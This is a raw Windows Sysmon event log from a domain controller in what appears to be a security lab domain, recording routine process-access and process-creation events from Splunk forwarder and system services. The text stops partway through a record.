15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-5F00-000000008801}3184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-5F00-000000008801}3184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.271{D28789B6-7C78-5FA1-5F00-000000008801}3184C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.304{D28789B6-7C73-5FA1-3700-000000008801}3084WIN-DC-8070fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-5E00-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-5E00-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.019{D28789B6-7C78-5FA1-5D00-000000008801}39203932C:\Windows\system32\cmd.exe{D28789B6-7C78-5FA1-5E00-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.020{D28789B6-7C78-5FA1-5E00-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7C78-5FA1-5D00-000000008801}3920C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-5D00-000000008801}3920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 